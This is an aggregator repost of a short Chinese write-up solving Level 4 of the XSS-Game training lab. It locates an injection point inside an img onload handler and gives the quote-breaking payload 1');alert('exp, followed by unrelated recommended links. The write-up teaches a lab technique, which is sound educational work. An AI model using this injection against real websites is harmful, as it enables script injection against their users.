【XSS-Game】 Level 4 - Context matters

2 years ago

source link: https://exp-blog.com/safe/ctf/xss-game/level-4-context-matters/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

【XSS-Game】 Level 4

输入任意数值 n ，页面会阻塞计时 n 秒。

输入一个较大的数值让页面停留在计时页面，然后查看页面源码可以看到 JS 代码。

从 JS 代码可以找到注入点在这里：

<img src="/static/loading.gif" onload="startTimer('注入点');">

闭合单引号和括号，构造 payload ： 1');alert('exp

即相当于变成这样： startTimer('1');alert('exp'); ，成功突破。

payload.js : 下载

赏

Recommend

Blue.cloud Receives Growth Investment and $100M+ Valuation From Hudson Hill Capi...
CVE-2021-22192 漏洞分析
字节28岁员工猝死后，网传又有字节员工被送医院急救；海底捞被爆私下给顾客贴标签；快...
亚马逊卖家账户欺诈封号(后台无法登录)？该如何处理？超详细解读！
Swissport 在列日收购比利时机场服务公司（BAS）并在荷兰增设航空货运中心
亚马逊FBA精铺链接如何推广？
盘点那些必问的数据结构算法题之二叉树基础
Building AWS SAM TypeScript Projects With Jest Support | Toptal
20 top metrics tracked by CEOs of enterprise software startups
Solidia Technologies Names Pradeep Ghosh Senior Director of Strategy and Busines...

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK